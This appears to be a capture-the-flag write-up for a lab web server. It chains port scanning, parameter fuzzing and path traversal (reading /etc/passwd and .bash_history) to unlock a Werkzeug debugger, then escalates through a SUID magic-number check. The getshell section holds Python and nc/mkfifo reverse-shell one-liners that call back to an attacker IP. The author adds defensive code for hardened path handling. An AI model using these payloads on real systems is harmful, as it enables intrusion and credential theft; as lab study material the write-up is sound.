Port Scanning

nmap --min-rate=10000 -p- 10.10.77.138
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-23 05:42 UTC
Nmap scan report for ip-10-10-77-138.eu-west-1.compute.internal (10.10.77.138)
Host is up (0.0043s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
5000/tcp open upnp
MAC Address: 02:BB:D6:ED:30:03 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.84 seconds
nmap -sT -sV -sC -O -p22,80,5000 10.10.77.138
Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-23 05:42 UTC
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 05:43 (0:00:12 remaining)
Nmap scan report for ip-10-10-77-138.eu-west-1.compute.internal (10.10.77.138)
Host is up (0.00050s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 440e60ab1e865b442851db3f9b122177 (RSA)
| 256 592f70769f65abdc0c7dc1a2a34de640 (ECDSA)
|_ 256 109f0bddd64dc77a3dff52421d296eba (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Book Store
5000/tcp open http Werkzeug httpd 0.14.1 (Python 3.6.9)
| http-robots.txt: 1 disallowed entry
|_/api </p>
|_http-title: Home
MAC Address: 02:BB:D6:ED:30:03 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.10 - 3.13 (94%), Linux 3.8 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.04 seconds

Web

Both 80 and 5000 serve web content, but the one on 5000 is a Python application (Werkzeug, per the nmap banner).

A quick directory scan: port 80 has nothing special, just a home page and a login page. Port 5000 has an /api page that lists a lot of API endpoints, plus a Werkzeug debugger console, which requires a PIN.

Looking at port 80, the login form does not seem to work and there is no way to register an account. But the page source contains this comment:

Still Working on this page will add the backend support soon, also the debugger pin is inside sid’s bash history file

So the console PIN can apparently be recovered from sid's bash history file, i.e. .bash_history?

The /api page on port 5000 lists plenty of endpoints, but they are all v2. Maybe v1 is still around; fuzz it for hidden parameters:

ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'http://10.10.77.138:5000/api/v1/resources/books?FUZZ=1'

This turns up a `show` parameter. Requesting it returns an error saying the file does not exist, which smells like file inclusion / path traversal:

http://10.10.77.138:5000/api/v1/resources/books?show=../../../../../../etc/passwd

It works. /etc/passwd reveals a user named sid, so read his bash history:

http://10.10.77.138:5000/api/v1/resources/books?show=../../../../../../home/sid/.bash_history

The PIN is in there: 123-321-135
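The `show` parameter behaves like a classic path-traversal file read. As an added illustration (my own code, not the box's source, which we never saw), here is a minimal model of the handler pattern that produces this bug, beside a hardened version that resolves the final path and refuses anything outside the books directory. The parameter name `show` is the one ffuf found; the directory tree, file names and contents are constructed for the demo:

```python
# Added example: the vulnerable file-read pattern behind ?show=../../etc/passwd
# and a hardened replacement. Everything below is a constructed fixture, not the
# real box.
import os
import tempfile
from pathlib import Path
from typing import Optional


def build_fixture() -> Path:
    """Create a throw-away tree: <root>/app/books/ holds the legitimate files,
    <root>/etc/passwd stands in for a file the API must never serve."""
    root = Path(tempfile.mkdtemp(prefix="bookstore-"))
    books = root / "app" / "books"
    books.mkdir(parents=True)
    (books / "catalog.txt").write_text("Book Store catalog\n")
    (root / "etc").mkdir()
    (root / "etc" / "passwd").write_text(
        "root:x:0:0:root:/root:/bin/bash\n"
        "sid:x:1000:1000::/home/sid:/bin/bash\n"   # constructed sample line
    )
    return root


def show_vulnerable(books_dir: Path, show: str) -> str:
    """Vulnerable: the user-controlled value is joined onto the books directory
    and opened as-is. os.path.join does no normalisation, so every '..' walks
    one level up and out of books_dir, and an absolute value replaces the base
    entirely."""
    with open(os.path.join(books_dir, show)) as fh:
        return fh.read()


def show_hardened(books_dir: Path, show: str) -> Optional[str]:
    """Hardened: resolve the final path (symlinks included) and require it to
    stay inside books_dir. Comparing resolved paths beats filtering '../'
    substrings, which encoding variants and symlinks routinely bypass."""
    base = books_dir.resolve()
    target = (base / show).resolve()
    try:
        target.relative_to(base)          # raises ValueError if outside base
    except ValueError:
        return None                       # traversal attempt: refuse
    if not target.is_file():
        return None                       # directories, missing files: refuse
    return target.read_text()


if __name__ == "__main__":
    root = build_fixture()
    books = root / "app" / "books"
    print(show_vulnerable(books, "../../etc/passwd"))   # leaks the file
    print(show_hardened(books, "../../etc/passwd"))     # None
```

The hardened variant keys on the resolved path, so `../../etc/passwd`, an absolute path, and a symlink planted inside the books directory are all rejected by the same check; the request for `catalog.txt` still works.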

Getshell

The PIN unlocks a Python console in the Werkzeug debugger, so go straight for a reverse shell:

import sys, socket, os, pty; s = socket.socket(); s.connect(('10.11.38.245', 80)); [os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]; pty.spawn("/bin/sh")

After running it the connection was dropped?? Maybe sockets can't be used from Python here?

Try a system command instead.

After trying a few bash reverse shells, this one worked:

import os
os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.38.245 443 >/tmp/f')

Privilege Escalation

There is a SUID binary in the home directory that asks us for a magic number.

Download the binary and decompile it in IDA.

In main there is this code:

v6 = 23987;
puts("What's The Magic Number?!");
__isoc99_scanf("%d", &v5);
v7 = v6 ^ v5 ^ 0x1116;
if ( v7 == 1573724660 )
    system("/bin/bash -p");
else
    puts("Incorrect Try Harder");

So we just need to solve v6 ^ v5 ^ 0x1116 = 1573724660

for v5. XOR is its own inverse, so XOR both sides with the two known constants:

v6v5 = 1573724660 ^ 0x1116   # v6 ^ v5, after cancelling 0x1116 from both sides
v5 = 23987 ^ v6v5            # cancel v6 = 23987 the same way
print(v5)

Result: 1573743953

Run the program, enter that number, and we are root!
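As an added check (my own code, not from the original write-up), the same recovery as a function that also replays the decompiled comparison, so the candidate is verified before it is typed into a SUID binary. The constants are the ones IDA showed above; the functions generalise to any XOR chain with one unknown. The caveat it handles is that `scanf("%d")` stores a signed 32-bit int, so a recovered value with bit 31 set would have to be entered as a negative decimal:

```python
# Added example: solve v6 ^ v5 ^ KEY == TARGET for v5 and replay the check
# on 32-bit signed ints, the way the compiled binary does it.

V6 = 23987            # local initialised right before the prompt
KEY = 0x1116          # immediate XORed in
TARGET = 1573724660   # value the result is compared against


def to_int32(n: int) -> int:
    """Reduce a Python int to the signed 32-bit value an `int` would hold."""
    n &= 0xFFFFFFFF
    return n - 0x100000000 if n & 0x80000000 else n


def magic_check(v5: int, v6: int = V6, key: int = KEY, target: int = TARGET) -> bool:
    """Replay of `v7 = v6 ^ v5 ^ 0x1116; if (v7 == 1573724660)` on int32."""
    v7 = to_int32(to_int32(v6) ^ to_int32(v5) ^ to_int32(key))
    return v7 == to_int32(target)


def solve_magic(v6: int = V6, key: int = KEY, target: int = TARGET) -> int:
    """x ^ a == b  <=>  x == b ^ a, so peel both constants off the target."""
    return to_int32(target ^ key ^ v6)


def scanf_input(v5: int) -> str:
    """What to type at the prompt: scanf("%d") parses a signed decimal, so a
    value with bit 31 set is entered in its negative two's-complement form."""
    return str(to_int32(v5))


if __name__ == "__main__":
    v5 = solve_magic()
    assert magic_check(v5), "candidate does not satisfy the decompiled check"
    print(scanf_input(v5))
```

For this binary the recovered value is below 2^31, so it is typed in as-is; `scanf_input` only matters for the general case where the XOR result lands in the negative half of the int range.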

Afterthoughts

A fairly simple box, with basically no tricky detours.